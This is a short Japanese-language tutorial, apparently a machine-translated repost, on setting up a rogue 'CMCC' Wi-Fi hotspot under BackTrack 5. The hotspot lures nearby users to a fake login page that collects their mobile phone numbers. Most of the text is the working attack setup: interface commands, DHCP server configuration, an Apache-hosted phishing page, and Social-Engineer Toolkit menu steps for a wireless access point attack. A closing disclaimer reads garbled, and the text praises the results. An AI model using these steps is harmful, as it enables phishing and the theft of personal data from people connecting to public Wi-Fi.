近くにCMCC信号がない場合は、無料のCMCCフィッシングWifi信号を構築し、携帯電話番号認証にアクセスしてユーザーの携帯電話番号を取得します計画します。準備:ワイヤレスネットワークカード(8137)、BT5、フィッシングページ1:ワイヤレスネットワークカードをBT5に挿入し、ネットワークカードを起動して、eth0をipに設定します。#ifconfig eth0 up #ifconfig wlan0 up #ifconfig eht0 192.168.10.2/24 2: dhcpをインストールし、#apt-get install dhcp3-server#vi /etc /default /dhcp3-serverINTERFACES =" eth0" INTERFACES =" at0"に変更します。#vi /etc/dhcp3/dhcpd.confまたは分割したいネットワークセグメントに変更します。デフォルトリース期間600、最大リース期間7200、オプションサブネットマスク255.255.255.0、オプションブロードキャストアドレス192.168.10.255、オプションルータ192.168.10.2、オプションドメイン名サーバ192.168.10.1、オプションドメイン名" www.metasploit.cn";サブネット192.168.10.0ネットマスク255.255.255.0 {範囲192.168.10.10 192.168.10.100;}図3:Apacheを起動し、フィッシングページを設定する#/etc/init.d/apache2 start#cd /Var /www /??? //Webサイトのディレクトリを入力します。bt5のapacheのデフォルトのホームページはindex.html#vi index.htmlです。//自分のフィッシングページに変更します。ここでは、デモ用に基本的なフィッシングBT5を挿入します。 XSSプラットフォームがインストールされていますが、ここでipはdhcp設定ファイルで割り当てたのと同じネットワークセグメントに注意を払う必要があります。そうでなければ他の人が接続でき、アクセスできません。 4:ほぼ準備して、アーティファクトを送信する必要があります#cd /pentest /exploits /set /#./set最初のセットを選択> 11)?ソーシャルエンジニアリング攻撃次のステップ最初のセットを選択> 8 WirelessAccess Point Attack Vector次のセット:wireless> 1 //1を選択1開始すると、dhcp3-serverファイルを編集するように求められます。前に編集したので、Ctrl + xを押して直接終了します。次に、割り当てられたIPセグメントセットを選択します。wireless> 2ワイヤレスネットワークインターフェイスを入力します(例:wlan0)。wlan0 //wlan0を選択します(1つを忘れます。#vi /pentest/exploits/set/config/set_config.py自分のものに変更します)。 APの名前は、私はCMCCにそれを変更)私はそれを任意のウェブサイトを開くためにパスワードを入力せずにAPを接続することの効果は私のフィッシングページUCランディング効果の要約にジャンプします。携帯電話番号、効果はまだ良いです、偽のcmccランディングページであれば、効果は良くなります! (技術的な研究のみです。法的な目的には使用しないでください。結果はご自身の責任で行ってください)この記事は[System Home] www.xp85.comからのものです。